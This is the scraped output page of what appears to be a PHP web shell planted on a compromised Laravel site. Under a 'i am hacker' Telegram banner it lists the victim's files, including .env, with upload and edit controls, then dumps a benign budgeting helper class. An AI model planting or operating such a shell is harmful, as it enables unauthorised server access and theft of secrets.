telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log15209132 KBJuly 18 2025 16:54:150644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
starting_month = $starting_month; $this->financial_year = $financial_year; } public function setStartingMonth($starting_month) { $this->starting_month = $starting_month; return $this; } public function getMonths() { $first_month = $this->financial_year . '-' . $this->starting_month; $months = collect([ $this->readableMonth($first_month) ]); //Init the first month $current_month = $first_month; // Iterate over the nex for ($i = 0; $i < 11; $i++) { $current_month = date('Y-m', strtotime("+1 months", strtotime($current_month))); $readable_month = $this->readableMonth($current_month); $months->push($readable_month); } return $months; } public static function getCurrentFinancialYear($start_month) { $current_month = date('Y-m'); $financial_year_starts = date('Y') . '-' . $start_month; $previous_financial_year_starts = date('Y-m', strtotime("-1 year", strtotime($financial_year_starts))); $financial_year = (strtotime($current_month) < strtotime($financial_year_starts)) ? date('Y', strtotime($previous_financial_year_starts)) : date('Y', strtotime($financial_year_starts)); return $financial_year; } public function readableMonth($date) { return date('F Y', strtotime($date)); } public function quartelyBudgetToMonthly(array $months, int $quarter_budget, bool $eliminate_decimals) { $monthly_budget = []; switch ($eliminate_decimals) { case true: $single_month = intdiv($quarter_budget, 3); $first_two_months = $single_month * 2; $last_month = $quarter_budget - $first_two_months; foreach ($months as $index => $month) { $month_number = $index + 1; if ($month_number == 3) { $monthly_budget[$month] = $last_month; break; } $monthly_budget[$month] = $single_month; } break; case false: $single_month = $quarter_budget / 3; foreach ($months as $month) { $monthly_budget[$month] = $single_month; } break; } return $monthly_budget; } public function yearlyBudgetToMonthly(int $yearly_budget, bool $eliminate_decimals) { $monthly_budget = []; switch ($eliminate_decimals) { case true: $single_month = intdiv($yearly_budget, 12); $first_eleven_months = $single_month * 11; $last_month = $yearly_budget - $first_eleven_months; for ($i = 1; $i <= 12; $i++) { $month_number = "month_$i"; if ($i == 12) { $monthly_budget[$month_number] = $last_month; break; } $monthly_budget[$month_number] = $single_month; } break; case false: $single_month = $yearly_budget / 12; for ($i = 1; $i <= 12; $i++) { $month_number = "month_$i"; $monthly_budget[$month_number] = $single_month; } break; } return $monthly_budget; } }